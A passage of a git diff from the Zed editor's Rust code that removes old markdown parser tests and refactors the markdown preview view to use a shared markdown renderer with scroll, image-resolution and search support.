1. 
Number 2 -1. Number A -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..12, 1, Task(false, 2..5), vec![p("TODO", 6..10)]), - list_item(13..26, 2, Task(true, 15..18), vec![p("Checked", 19..26)]), - list_item(29..40, 2, Unordered, vec![p("Unordered", 31..40)]), - list_item(43..54, 2, Ordered(1), vec![p("Number 1", 46..54)]), - list_item(57..68, 2, Ordered(2), vec![p("Number 2", 60..68)]), - list_item(69..80, 1, Ordered(1), vec![p("Number A", 72..80)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_linebreak_is_handled_correctly() { - let parsed = parse( - "\ -- [ ] Task 1 - -- [x] Task 2 -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..13, 1, Task(false, 2..5), vec![p("Task 1", 6..12)]), - list_item(14..26, 1, Task(true, 16..19), vec![p("Task 2", 20..26)]), - ], - ); - } - - #[gpui::test] - async fn test_list_nested() { - let parsed = parse( - "\ -* Item 1 -* Item 2 -* Item 3 - -1. Hello -1. Two - 1. Three -2. Four -3. Five - -* First - 1. Hello - 1. Goodbyte - - Inner - - Inner - 2. 
Goodbyte - - Next item empty - - -* Last -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("Item 1", 2..8)]), - list_item(9..17, 1, Unordered, vec![p("Item 2", 11..17)]), - list_item(18..27, 1, Unordered, vec![p("Item 3", 20..26)]), - list_item(28..36, 1, Ordered(1), vec![p("Hello", 31..36)]), - list_item(37..46, 1, Ordered(2), vec![p("Two", 40..43),]), - list_item(47..55, 2, Ordered(1), vec![p("Three", 50..55)]), - list_item(56..63, 1, Ordered(3), vec![p("Four", 59..63)]), - list_item(64..72, 1, Ordered(4), vec![p("Five", 67..71)]), - list_item(73..82, 1, Unordered, vec![p("First", 75..80)]), - list_item(83..96, 2, Ordered(1), vec![p("Hello", 86..91)]), - list_item(97..116, 3, Ordered(1), vec![p("Goodbyte", 100..108)]), - list_item(117..124, 4, Unordered, vec![p("Inner", 119..124)]), - list_item(133..140, 4, Unordered, vec![p("Inner", 135..140)]), - list_item(143..159, 2, Ordered(2), vec![p("Goodbyte", 146..154)]), - list_item(160..180, 3, Unordered, vec![p("Next item empty", 165..180)]), - list_item(186..190, 3, Unordered, vec![]), - list_item(191..197, 1, Unordered, vec![p("Last", 193..197)]), - ] - ); - } - - #[gpui::test] - async fn test_list_with_nested_content() { - let parsed = parse( - "\ -* This is a list item with two paragraphs. - - This is the second paragraph in the list item. -", - ) - .await; - - assert_eq!( - parsed.children, - vec![list_item( - 0..96, - 1, - Unordered, - vec![ - p("This is a list item with two paragraphs.", 4..44), - p("This is the second paragraph in the list item.", 50..97) - ], - ),], - ); - } - - #[gpui::test] - async fn test_list_item_with_inline_html() { - let parsed = parse( - "\ -* This is a list item with an inline HTML tag. 
-", - ) - .await; - - assert_eq!( - parsed.children, - vec![list_item( - 0..67, - 1, - Unordered, - vec![p("This is a list item with an inline HTML tag.", 4..44),], - ),], - ); - } - - #[gpui::test] - async fn test_nested_list_with_paragraph_inside() { - let parsed = parse( - "\ -1. a - 1. b - 1. c - - text - - 1. d -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..7, 1, Ordered(1), vec![p("a", 3..4)],), - list_item(8..20, 2, Ordered(1), vec![p("b", 12..13),],), - list_item(21..27, 3, Ordered(1), vec![p("c", 25..26),],), - p("text", 32..37), - list_item(41..46, 2, Ordered(1), vec![p("d", 45..46),],), - ], - ); - } - - #[gpui::test] - async fn test_list_with_leading_text() { - let parsed = parse( - "\ -* `code` -* **bold** -* [link](https://example.com) -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("code", 2..8)]), - list_item(9..19, 1, Unordered, vec![p("bold", 11..19)]), - list_item(20..49, 1, Unordered, vec![p("link", 22..49)],), - ], - ); - } - - #[gpui::test] - async fn test_simple_block_quote() { - let parsed = parse("> Simple block quote with **styled text**").await; - - assert_eq!( - parsed.children, - vec![block_quote( - vec![p("Simple block quote with styled text", 2..41)], - 0..41 - )] - ); - } - - #[gpui::test] - async fn test_simple_block_quote_with_multiple_lines() { - let parsed = parse( - "\ -> # Heading -> More -> text -> -> More text -", - ) - .await; - - assert_eq!( - parsed.children, - vec![block_quote( - vec![ - h1(text("Heading", 4..11), 2..12), - p("More text", 14..26), - p("More text", 30..40) - ], - 0..40 - )] - ); - } - - #[gpui::test] - async fn test_nested_block_quote() { - let parsed = parse( - "\ -> A -> -> > # B -> -> C - -More text -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - block_quote( - vec![ - p("A", 2..4), - block_quote(vec![h1(text("B", 12..13), 10..14)], 8..14), - p("C", 18..20) - ], - 0..20 - ), - p("More text", 21..31) - ] - ); 
- } - - #[gpui::test] - async fn test_code_block() { - let parsed = parse( - "\ -``` -fn main() { - return 0; -} -``` -", - ) - .await; - - assert_eq!( - parsed.children, - vec![code_block( - None, - "fn main() {\n return 0;\n}", - 0..35, - None - )] - ); - } - - #[gpui::test] - async fn test_code_block_with_language(executor: BackgroundExecutor) { - let language_registry = Arc::new(LanguageRegistry::test(executor.clone())); - language_registry.add(language::rust_lang()); - - let parsed = parse_markdown( - "\ -```rust -fn main() { - return 0; -} -``` -", - None, - Some(language_registry), - ) - .await; - - assert_eq!( - parsed.children, - vec![code_block( - Some("rust".to_string()), - "fn main() {\n return 0;\n}", - 0..39, - Some(vec![]) - )] - ); - } - - fn h1(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H1, - contents, - }) - } - - fn h2(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H2, - contents, - }) - } - - fn h3(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H3, - contents, - }) - } - - fn p(contents: &str, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Paragraph(text(contents, source_range)) - } - - fn text(contents: &str, source_range: Range) -> MarkdownParagraph { - vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - highlights: Vec::new(), - regions: Vec::new(), - source_range, - contents: contents.to_string().into(), - })] - } - - fn block_quote( - children: Vec, - source_range: Range, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::BlockQuote(ParsedMarkdownBlockQuote { - source_range, - children, - }) - } - - fn code_block( - language: 
Option, - code: &str, - source_range: Range, - highlights: Option, HighlightId)>>, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::CodeBlock(ParsedMarkdownCodeBlock { - source_range, - language, - contents: code.to_string().into(), - highlights, - }) - } - - fn list_item( - source_range: Range, - depth: u16, - item_type: ParsedMarkdownListItemType, - content: Vec, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - item_type, - depth, - content, - nested: false, - }) - } - - fn nested_list_item( - source_range: Range, - depth: u16, - item_type: ParsedMarkdownListItemType, - content: Vec, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - item_type, - depth, - content, - nested: true, - }) - } - - fn table( - source_range: Range, - caption: Option, - header: Vec, - body: Vec, - ) -> ParsedMarkdownTable { - ParsedMarkdownTable { - source_range, - header, - body, - caption, - } - } - - fn row(columns: Vec) -> ParsedMarkdownTableRow { - ParsedMarkdownTableRow { columns } - } - - fn column( - col_span: usize, - row_span: usize, - is_header: bool, - children: MarkdownParagraph, - alignment: ParsedMarkdownTableAlignment, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header, - children, - alignment, - } - } - - impl PartialEq for ParsedMarkdownTable { - fn eq(&self, other: &Self) -> bool { - self.source_range == other.source_range - && self.header == other.header - && self.body == other.body - } - } - - impl PartialEq for ParsedMarkdownText { - fn eq(&self, other: &Self) -> bool { - self.source_range == other.source_range && self.contents == other.contents - } - } -} diff --git a/crates/markdown_preview/src/markdown_preview.rs b/crates/markdown_preview/src/markdown_preview.rs index c7e8e9e9272e196da25be086640316129fb819bd..982eff7c74513cb29b368d49ecd454162f2c3913 100644 --- 
a/crates/markdown_preview/src/markdown_preview.rs +++ b/crates/markdown_preview/src/markdown_preview.rs @@ -1,11 +1,7 @@ use gpui::{App, actions}; use workspace::Workspace; -pub mod markdown_elements; -mod markdown_minifier; -pub mod markdown_parser; pub mod markdown_preview_view; -pub mod markdown_renderer; pub use zed_actions::preview::markdown::{OpenPreview, OpenPreviewToTheSide}; @@ -26,6 +22,10 @@ actions!( ScrollUpByItem, /// Scrolls down by one markdown element in the markdown preview ScrollDownByItem, + /// Scrolls to the top of the markdown preview. + ScrollToTop, + /// Scrolls to the bottom of the markdown preview. + ScrollToBottom, /// Opens a following markdown preview that syncs with the editor. OpenFollowingPreview ] diff --git a/crates/markdown_preview/src/markdown_preview_view.rs b/crates/markdown_preview/src/markdown_preview_view.rs index 79bd7f33290e0510df8dff908b09541717b41696..3e6423b36603e247ba5da2a2166a8357701fa5cd 100644 --- a/crates/markdown_preview/src/markdown_preview_view.rs +++ b/crates/markdown_preview/src/markdown_preview_view.rs @@ -1,46 +1,51 @@ use std::cmp::min; +use std::ops::Range; +use std::path::{Path, PathBuf}; use std::sync::Arc; use std::time::Duration; -use std::{ops::Range, path::PathBuf}; use anyhow::Result; use editor::scroll::Autoscroll; use editor::{Editor, EditorEvent, MultiBufferOffset, SelectionEffects}; use gpui::{ - App, ClickEvent, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, - IntoElement, IsZero, ListState, ParentElement, Render, RetainAllImageCache, Styled, - Subscription, Task, WeakEntity, Window, list, + App, Context, Entity, EventEmitter, FocusHandle, Focusable, ImageSource, InteractiveElement, + IntoElement, IsZero, Pixels, Render, Resource, RetainAllImageCache, ScrollHandle, SharedString, + SharedUri, Subscription, Task, WeakEntity, Window, point, }; use language::LanguageRegistry; +use markdown::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, 
MarkdownFont, + MarkdownOptions, MarkdownStyle, +}; +use project::search::SearchQuery; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{WithScrollbar, prelude::*}; -use workspace::item::{Item, ItemHandle}; -use workspace::{Pane, Workspace}; +use util::normalize_path; +use workspace::item::{Item, ItemBufferKind, ItemHandle}; +use workspace::searchable::{ + Direction, SearchEvent, SearchOptions, SearchToken, SearchableItem, SearchableItemHandle, +}; +use workspace::{OpenOptions, OpenVisible, Pane, Workspace}; -use crate::markdown_elements::ParsedMarkdownElement; -use crate::markdown_renderer::{CheckboxClickedEvent, MermaidState}; use crate::{ - OpenFollowingPreview, OpenPreview, OpenPreviewToTheSide, ScrollPageDown, ScrollPageUp, - markdown_elements::ParsedMarkdown, - markdown_parser::parse_markdown, - markdown_renderer::{RenderContext, render_markdown_block}, + OpenFollowingPreview, OpenPreview, OpenPreviewToTheSide, ScrollDown, ScrollDownByItem, }; -use crate::{ScrollDown, ScrollDownByItem, ScrollUp, ScrollUpByItem}; +use crate::{ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ScrollUp, ScrollUpByItem}; const REPARSE_DEBOUNCE: Duration = Duration::from_millis(200); pub struct MarkdownPreviewView { workspace: WeakEntity, - image_cache: Entity, active_editor: Option, focus_handle: FocusHandle, - contents: Option, - selected_block: usize, - list_state: ListState, - language_registry: Arc, - mermaid_state: MermaidState, - parsing_markdown_task: Option>>, + markdown: Entity, + _markdown_subscription: Subscription, + active_source_index: Option, + scroll_handle: ScrollHandle, + image_cache: Entity, + base_directory: Option, + pending_update_task: Option>>, mode: MarkdownPreviewMode, } @@ -205,19 +210,35 @@ impl MarkdownPreviewView { cx: &mut Context, ) -> Entity { cx.new(|cx| { - let list_state = ListState::new(0, gpui::ListAlignment::Top, px(1000.)); - + let markdown = cx.new(|cx| { + Markdown::new_with_options( 
+ SharedString::default(), + Some(language_registry), + None, + MarkdownOptions { + parse_html: true, + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ) + }); let mut this = Self { - selected_block: 0, active_editor: None, focus_handle: cx.focus_handle(), workspace: workspace.clone(), - contents: None, - list_state, - language_registry, - mermaid_state: Default::default(), - parsing_markdown_task: None, + _markdown_subscription: cx.observe( + &markdown, + |this: &mut Self, _: Entity, cx| { + this.sync_active_root_block(cx); + }, + ), + markdown, + active_source_index: None, + scroll_handle: ScrollHandle::new(), image_cache: RetainAllImageCache::new(cx), + base_directory: None, + pending_update_task: None, mode, }; @@ -277,19 +298,19 @@ impl MarkdownPreviewView { |this, editor, event: &EditorEvent, window, cx| { match event { EditorEvent::Edited { .. } + | EditorEvent::BufferEdited { .. } | EditorEvent::DirtyChanged - | EditorEvent::ExcerptsEdited { .. } => { - this.parse_markdown_from_active_editor(true, window, cx); + | EditorEvent::BuffersEdited { .. } => { + this.update_markdown_from_active_editor(true, false, window, cx); } EditorEvent::SelectionsChanged { .. 
} => { - let selection_range = editor.update(cx, |editor, cx| { - editor - .selections - .last::(&editor.display_snapshot(cx)) - .range() - }); - this.selected_block = this.get_block_index_under_cursor(selection_range); - this.list_state.scroll_to_reveal_item(this.selected_block); + let (selection_start, editor_is_focused) = + editor.update(cx, |editor, cx| { + let index = Self::selected_source_index(editor, cx); + let focused = editor.focus_handle(cx).is_focused(window); + (index, focused) + }); + this.sync_preview_to_source_index(selection_start, editor_is_focused, cx); cx.notify(); } _ => {} @@ -297,23 +318,30 @@ impl MarkdownPreviewView { }, ); + self.base_directory = Self::get_folder_for_active_editor(editor.read(cx), cx); self.active_editor = Some(EditorState { editor, _subscription: subscription, }); - self.parse_markdown_from_active_editor(false, window, cx); + self.update_markdown_from_active_editor(false, true, window, cx); } - fn parse_markdown_from_active_editor( + fn update_markdown_from_active_editor( &mut self, wait_for_debounce: bool, + should_reveal: bool, window: &mut Window, cx: &mut Context, ) { if let Some(state) = &self.active_editor { - self.parsing_markdown_task = Some(self.parse_markdown_in_background( + // if there is already a task to update the ui and the current task is also debounced (not high priority), do nothing + if wait_for_debounce && self.pending_update_task.is_some() { + return; + } + self.pending_update_task = Some(self.schedule_markdown_update( wait_for_debounce, + should_reveal, state.editor.clone(), window, cx, @@ -321,62 +349,98 @@ impl MarkdownPreviewView { } } - fn parse_markdown_in_background( + fn schedule_markdown_update( &mut self, wait_for_debounce: bool, + should_reveal_selection: bool, editor: Entity, window: &mut Window, cx: &mut Context, ) -> Task> { - let language_registry = self.language_registry.clone(); - cx.spawn_in(window, async move |view, cx| { if wait_for_debounce { // Wait for the user to stop typing 
cx.background_executor().timer(REPARSE_DEBOUNCE).await; } - let (contents, file_location) = view.update(cx, |_, cx| { - let editor = editor.read(cx); - let contents = editor.buffer().read(cx).snapshot(cx).text(); - let file_location = MarkdownPreviewView::get_folder_for_active_editor(editor, cx); - (contents, file_location) - })?; + let editor_clone = editor.clone(); + let update = view.update(cx, |view, cx| { + let is_active_editor = view + .active_editor + .as_ref() + .is_some_and(|active_editor| active_editor.editor == editor_clone); + if !is_active_editor { + return None; + } - let parsing_task = cx.background_spawn(async move { - parse_markdown(&contents, file_location, Some(language_registry)).await - }); - let contents = parsing_task.await; + let (contents, selection_start) = editor_clone.update(cx, |editor, cx| { + let contents = editor.buffer().read(cx).snapshot(cx).text(); + let selection_start = Self::selected_source_index(editor, cx); + (contents, selection_start) + }); + Some((SharedString::from(contents), selection_start)) + })?; view.update(cx, move |view, cx| { - view.mermaid_state.update(&contents, cx); - let markdown_blocks_count = contents.children.len(); - view.contents = Some(contents); - let scroll_top = view.list_state.logical_scroll_top(); - view.list_state.reset(markdown_blocks_count); - view.list_state.scroll_to(scroll_top); + if let Some((contents, selection_start)) = update { + view.markdown.update(cx, |markdown, cx| { + markdown.reset(contents, cx); + }); + view.sync_preview_to_source_index(selection_start, should_reveal_selection, cx); + cx.emit(SearchEvent::MatchesInvalidated); + } + view.pending_update_task = None; cx.notify(); }) }) } - fn move_cursor_to_block( - &self, - window: &mut Window, + fn selected_source_index(editor: &Editor, cx: &mut App) -> usize { + editor + .selections + .last::(&editor.display_snapshot(cx)) + .range() + .start + .0 + } + + fn sync_preview_to_source_index( + &mut self, + source_index: usize, + reveal: 
bool, cx: &mut Context, - selection: Range, ) { - if let Some(state) = &self.active_editor { - state.editor.update(cx, |editor, cx| { - editor.change_selections( - SelectionEffects::scroll(Autoscroll::center()), - window, - cx, - |selections| selections.select_ranges(vec![selection]), - ); - window.focus(&editor.focus_handle(cx), cx); - }); - } + self.active_source_index = Some(source_index); + self.sync_active_root_block(cx); + self.markdown.update(cx, |markdown, cx| { + if reveal { + markdown.request_autoscroll_to_source_index(source_index, cx); + } + }); + } + + fn sync_active_root_block(&mut self, cx: &mut Context) { + self.markdown.update(cx, |markdown, cx| { + markdown.set_active_root_for_source_index(self.active_source_index, cx); + }); + } + + fn move_cursor_to_source_index( + editor: &Entity, + source_index: usize, + window: &mut Window, + cx: &mut App, + ) { + editor.update(cx, |editor, cx| { + let selection = MultiBufferOffset(source_index)..MultiBufferOffset(source_index); + editor.change_selections( + SelectionEffects::scroll(Autoscroll::center()), + window, + cx, + |selections| selections.select_ranges(vec![selection]), + ); + window.focus(&editor.focus_handle(cx), cx); + }); } /// The absolute path of the file that is currently being previewed. 
@@ -392,52 +456,24 @@ impl MarkdownPreviewView { } } - fn get_block_index_under_cursor(&self, selection_range: Range) -> usize { - let mut block_index = None; - let cursor = selection_range.start.0; - - let mut last_end = 0; - if let Some(content) = &self.contents { - for (i, block) in content.children.iter().enumerate() { - let Some(Range { start, end }) = block.source_range() else { - continue; - }; - - // Check if the cursor is between the last block and the current block - if last_end <= cursor && cursor < start { - block_index = Some(i.saturating_sub(1)); - break; - } - - if start <= cursor && end >= cursor { - block_index = Some(i); - break; - } - last_end = end; - } - - if block_index.is_none() && last_end < cursor { - block_index = Some(content.children.len().saturating_sub(1)); - } - } - - block_index.unwrap_or_default() + fn line_scroll_amount(&self, cx: &App) -> Pixels { + let settings = ThemeSettings::get_global(cx); + settings.buffer_font_size(cx) * settings.buffer_line_height.value() } - fn should_apply_padding_between( - current_block: &ParsedMarkdownElement, - next_block: Option<&ParsedMarkdownElement>, - ) -> bool { - !(current_block.is_list_item() && next_block.map(|b| b.is_list_item()).unwrap_or(false)) + fn scroll_by_amount(&self, distance: Pixels) { + let offset = self.scroll_handle.offset(); + self.scroll_handle + .set_offset(point(offset.x, offset.y - distance)); } fn scroll_page_up(&mut self, _: &ScrollPageUp, _window: &mut Window, cx: &mut Context) { - let viewport_height = self.list_state.viewport_bounds().size.height; + let viewport_height = self.scroll_handle.bounds().size.height; if viewport_height.is_zero() { return; } - self.list_state.scroll_by(-viewport_height); + self.scroll_by_amount(-viewport_height); cx.notify(); } @@ -447,35 +483,49 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let viewport_height = self.list_state.viewport_bounds().size.height; + let viewport_height = 
self.scroll_handle.bounds().size.height; if viewport_height.is_zero() { return; } - self.list_state.scroll_by(viewport_height); + self.scroll_by_amount(viewport_height); cx.notify(); } fn scroll_up(&mut self, _: &ScrollUp, window: &mut Window, cx: &mut Context) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { let item_height = bounds.size.height; // Scroll no more than the rough equivalent of a large headline let max_height = window.rem_size() * 2; let scroll_height = min(item_height, max_height); - self.list_state.scroll_by(-scroll_height); + self.scroll_by_amount(-scroll_height); + } else { + let scroll_height = self.line_scroll_amount(cx); + if !scroll_height.is_zero() { + self.scroll_by_amount(-scroll_height); + } } cx.notify(); } fn scroll_down(&mut self, _: &ScrollDown, window: &mut Window, cx: &mut Context) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { let item_height = bounds.size.height; // Scroll no more than the rough equivalent of a large headline let max_height = window.rem_size() * 2; let scroll_height = min(item_height, max_height); - self.list_state.scroll_by(scroll_height); + self.scroll_by_amount(scroll_height); + } else { + let scroll_height = self.line_scroll_amount(cx); + if !scroll_height.is_zero() { + self.scroll_by_amount(scroll_height); + } } cx.notify(); } @@ -486,9 +536,11 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { - self.list_state.scroll_by(-bounds.size.height); + if let Some(bounds) = self + 
.scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { + self.scroll_by_amount(-bounds.size.height); } cx.notify(); } @@ -499,21 +551,213 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { - self.list_state.scroll_by(bounds.size.height); + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { + self.scroll_by_amount(bounds.size.height); } cx.notify(); } + + fn scroll_to_top(&mut self, _: &ScrollToTop, _window: &mut Window, cx: &mut Context) { + self.scroll_handle.scroll_to_item(0); + cx.notify(); + } + + fn scroll_to_bottom( + &mut self, + _: &ScrollToBottom, + _window: &mut Window, + cx: &mut Context, + ) { + self.scroll_handle.scroll_to_bottom(); + cx.notify(); + } + + fn render_markdown_element( + &self, + window: &mut Window, + cx: &mut Context, + ) -> MarkdownElement { + let workspace = self.workspace.clone(); + let base_directory = self.base_directory.clone(); + let active_editor = self + .active_editor + .as_ref() + .map(|state| state.editor.clone()); + + let mut workspace_directory = None; + if let Some(workspace_entity) = self.workspace.upgrade() { + let project = workspace_entity.read(cx).project(); + if let Some(tree) = project.read(cx).worktrees(cx).next() { + workspace_directory = Some(tree.read(cx).abs_path().to_path_buf()); + } + } + + let mut markdown_element = MarkdownElement::new( + self.markdown.clone(), + MarkdownStyle::themed(MarkdownFont::Editor, window, cx), + ) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::VisibleOnHover, + border: false, + }) + .scroll_handle(self.scroll_handle.clone()) + .show_root_block_markers() + .image_resolver({ + let base_directory = self.base_directory.clone(); + move |dest_url| { + resolve_preview_image( + dest_url, + base_directory.as_deref(), + 
workspace_directory.as_deref(), + ) + } + }) + .on_url_click(move |url, window, cx| { + open_preview_url(url, base_directory.clone(), &workspace, window, cx); + }); + + if let Some(active_editor) = active_editor { + let editor_for_checkbox = active_editor.clone(); + let view_handle = cx.entity().downgrade(); + markdown_element = markdown_element + .on_source_click(move |source_index, click_count, window, cx| { + if click_count == 2 { + Self::move_cursor_to_source_index(&active_editor, source_index, window, cx); + true + } else { + false + } + }) + .on_checkbox_toggle(move |source_range, new_checked, window, cx| { + let task_marker = if new_checked { "[x]" } else { "[ ]" }; + editor_for_checkbox.update(cx, |editor, cx| { + editor.edit( + [( + MultiBufferOffset(source_range.start) + ..MultiBufferOffset(source_range.end), + task_marker, + )], + cx, + ); + }); + if let Some(view) = view_handle.upgrade() { + cx.update_entity(&view, |this, cx| { + this.update_markdown_from_active_editor(false, false, window, cx); + }); + } + }); + } + + markdown_element + } +} + +fn open_preview_url( + url: SharedString, + base_directory: Option, + workspace: &WeakEntity, + window: &mut Window, + cx: &mut App, +) { + if let Some(path) = resolve_preview_path(url.as_ref(), base_directory.as_deref()) + && let Some(workspace) = workspace.upgrade() + { + let _ = workspace.update(cx, |workspace, cx| { + workspace + .open_abs_path( + normalize_path(path.as_path()), + OpenOptions { + visible: Some(OpenVisible::None), + ..Default::default() + }, + window, + cx, + ) + .detach(); + }); + return; + } + + cx.open_url(url.as_ref()); +} + +fn resolve_preview_path(url: &str, base_directory: Option<&Path>) -> Option { + if url.starts_with("http://") || url.starts_with("https://") { + return None; + } + + let decoded_url = urlencoding::decode(url) + .map(|decoded| decoded.into_owned()) + .unwrap_or_else(|_| url.to_string()); + let candidate = PathBuf::from(&decoded_url); + + if candidate.is_absolute() && 
candidate.exists() { + return Some(candidate); + } + + let base_directory = base_directory?; + let resolved = base_directory.join(decoded_url); + if resolved.exists() { + Some(resolved) + } else { + None + } +} + +fn resolve_preview_image( + dest_url: &str, + base_directory: Option<&Path>, + workspace_directory: Option<&Path>, +) -> Option { + if dest_url.starts_with("data:") { + return None; + } + + if dest_url.starts_with("http://") || dest_url.starts_with("https://") { + return Some(ImageSource::Resource(Resource::Uri(SharedUri::from( + dest_url.to_string(), + )))); + } + + let decoded = urlencoding::decode(dest_url) + .map(|decoded| decoded.into_owned()) + .unwrap_or_else(|_| dest_url.to_string()); + + let decoded_path = Path::new(&decoded); + + if let Ok(relative_path) = decoded_path.strip_prefix("/") { + if let Some(root) = workspace_directory { + let absolute_path = root.join(relative_path); + if absolute_path.exists() { + return Some(ImageSource::Resource(Resource::Path(Arc::from( + absolute_path.as_path(), + )))); + } + } + } + + let path = if Path::new(&decoded).is_absolute() { + PathBuf::from(decoded) + } else { + base_directory?.join(decoded) + }; + + Some(ImageSource::Resource(Resource::Path(Arc::from( + path.as_path(), + )))) } impl Focusable for MarkdownPreviewView { - fn focus_handle(&self, _: &App) -> gpui::FocusHandle { + fn focus_handle(&self, _: &App) -> FocusHandle { self.focus_handle.clone() } } impl EventEmitter<()> for MarkdownPreviewView {} +impl EventEmitter for MarkdownPreviewView {} impl Item for MarkdownPreviewView { type Event = (); @@ -538,14 +782,23 @@ impl Item for MarkdownPreviewView { } fn to_item_events(_event: &Self::Event, _f: &mut dyn FnMut(workspace::item::ItemEvent)) {} + + fn buffer_kind(&self, _cx: &App) -> ItemBufferKind { + ItemBufferKind::Singleton + } + + fn as_searchable( + &self, + handle: &Entity, + _: &App, + ) -> Option> { + Some(Box::new(handle.clone())) + } } impl Render for MarkdownPreviewView { fn render(&mut 
self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let buffer_size = ThemeSettings::get_global(cx).buffer_font_size(cx); - let buffer_line_height = ThemeSettings::get_global(cx).buffer_line_height; - - v_flex() + div() .image_cache(self.image_cache.clone()) .id("MarkdownPreview") .key_context("MarkdownPreview") @@ -556,115 +809,254 @@ impl Render for MarkdownPreviewView { .on_action(cx.listener(MarkdownPreviewView::scroll_down)) .on_action(cx.listener(MarkdownPreviewView::scroll_up_by_item)) .on_action(cx.listener(MarkdownPreviewView::scroll_down_by_item)) + .on_action(cx.listener(MarkdownPreviewView::scroll_to_top)) + .on_action(cx.listener(MarkdownPreviewView::scroll_to_bottom)) .size_full() .bg(cx.theme().colors().editor_background) - .p_4() - .text_size(buffer_size) - .line_height(relative(buffer_line_height.value())) - .child(div().flex_grow().map(|this| { - this.child( - list( - self.list_state.clone(), - cx.processor(|this, ix, window, cx| { - let Some(contents) = &this.contents else { - return div().into_any(); - }; - - let mut render_cx = RenderContext::new( - Some(this.workspace.clone()), - &this.mermaid_state, - window, - cx, - ) - .with_checkbox_clicked_callback(cx.listener( - move |this, e: &CheckboxClickedEvent, window, cx| { - if let Some(editor) = - this.active_editor.as_ref().map(|s| s.editor.clone()) - { - editor.update(cx, |editor, cx| { - let task_marker = - if e.checked() { "[x]" } else { "[ ]" }; - - editor.edit( - [( - MultiBufferOffset(e.source_range().start) - ..MultiBufferOffset(e.source_range().end), - task_marker, - )], - cx, - ); - }); - this.parse_markdown_from_active_editor(false, window, cx); - cx.notify(); - } - }, - )); - - let block = contents.children.get(ix).unwrap(); - let rendered_block = render_markdown_block(block, &mut render_cx); - - let should_apply_padding = Self::should_apply_padding_between( - block, - contents.children.get(ix + 1), - ); - - let selected_block = this.selected_block; - let scaled_rems 
= render_cx.scaled_rems(1.0); - div() - .id(ix) - .when(should_apply_padding, |this| { - this.pb(render_cx.scaled_rems(0.75)) - }) - .group("markdown-block") - .on_click(cx.listener( - move |this, event: &ClickEvent, window, cx| { - if event.click_count() == 2 - && let Some(source_range) = this - .contents - .as_ref() - .and_then(|c| c.children.get(ix)) - .and_then(|block: &ParsedMarkdownElement| { - block.source_range() - }) - { - this.move_cursor_to_block( - window, - cx, - MultiBufferOffset(source_range.start) - ..MultiBufferOffset(source_range.start), - ); - } - }, - )) - .map(move |container| { - let indicator = div() - .h_full() - .w(px(4.0)) - .when(ix == selected_block, |this| { - this.bg(cx.theme().colors().border) - }) - .group_hover("markdown-block", |s| { - if ix == selected_block { - s - } else { - s.bg(cx.theme().colors().border_variant) - } - }) - .rounded_xs(); - - container.child( - div() - .relative() - .child(div().pl(scaled_rems).child(rendered_block)) - .child(indicator.absolute().left_0().top_0()), - ) - }) - .into_any() - }), - ) - .size_full(), - ) - })) - .vertical_scrollbar_for(&self.list_state, window, cx) + .child( + div() + .id("markdown-preview-scroll-container") + .size_full() + .overflow_y_scroll() + .track_scroll(&self.scroll_handle) + .p_4() + .child(self.render_markdown_element(window, cx)), + ) + .vertical_scrollbar_for(&self.scroll_handle, window, cx) + } +} + +impl SearchableItem for MarkdownPreviewView { + type Match = Range; + + fn supported_options(&self) -> SearchOptions { + SearchOptions { + case: true, + word: true, + regex: true, + replacement: false, + selection: false, + select_all: false, + find_in_results: false, + } + } + + fn get_matches(&self, _window: &mut Window, cx: &mut App) -> (Vec, SearchToken) { + ( + self.markdown.read(cx).search_highlights().to_vec(), + SearchToken::default(), + ) + } + + fn clear_matches(&mut self, _window: &mut Window, cx: &mut Context) { + let had_highlights = 
